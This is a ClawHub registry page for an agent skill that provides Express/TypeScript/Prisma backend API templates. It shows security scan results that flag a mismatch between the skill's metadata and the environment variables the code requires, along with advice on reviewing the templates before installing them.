ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

backend developer

v1.0.0

Standardized backend REST API development following layered architecture patterns (Route → Controller → Service → Repository). Use when building new REST API...

0· 55·0 current·0 all-time
byBayu Dwi Satriyo@bayudsatriyo
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The name/description match the included templates and references: Express + TypeScript + Prisma + validation + layered architecture. However, the skill's manifest declares no required env vars or binaries while the templates and config explicitly expect Node.js/TypeScript, Prisma client, and environment variables (DATABASE_URL, JWT_SECRET). This mismatch looks like an oversight in metadata rather than malicious intent, but it is important operationally.
Instruction Scope
SKILL.md and the provided files limit actions to generating/using API templates, validation, error handling, and Prisma DB access. The instructions and code do not instruct the agent to read unrelated local files or exfiltrate data. They do, however, include code that will read process.env for DB and JWT configuration when run.
Install Mechanism
There is no install spec (instruction-only with template files). That lowers risk because nothing in the registry will automatically download or execute remote code. To run the templates you will need to install normal Node/npm dependencies locally (express, prisma, joi/zod, etc.).
!
Credentials
The code and references expect sensitive environment variables (e.g., DATABASE_URL, JWT_SECRET) and will validate/require them at startup (config/config.ts throws if missing). Yet the registry metadata lists no required env vars or primary credential. Requesting DB credentials and JWT secret is proportionate for a backend template, but the omission from metadata is an inconsistency the user should be aware of before supplying secrets to any third-party templates.
Persistence & Privilege
The skill is not always-on and does not request elevated platform privileges. It doesn't modify other skill configs or system-wide settings. Autonomous invocation is allowed by platform default but there is no sign this combines with other red flags.
What to consider before installing
This package appears to be a standard Node/TypeScript backend template (Express + Prisma + Joi/Zod patterns). Before installing or running it: 1) Inspect config/config.ts and other files that reference process.env — the templates expect DATABASE_URL and JWT_SECRET and will throw if missing. 2) Only supply real database credentials or JWT secrets after you verify the code and trust the source; use throwaway/dev credentials when evaluating. 3) The registry metadata does not list the runtime dependencies or required env vars — treat that as an author oversight and confirm required packages (Node, npm/Yarn, Prisma, TypeScript, Express, Joi/Zod) are installed. 4) Because the source/homepage is unknown, review the templates and references yourself (they are included) to ensure there are no hidden endpoints or telemetry before using in production. If you want higher assurance, request the skill author to declare required env vars and provide a source/homepage or a signed release.

Like a lobster shell, security has layers — review code before you run it.

latestvk9773kp5x6xjmk800bb7yv7bj583qmcd

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Comments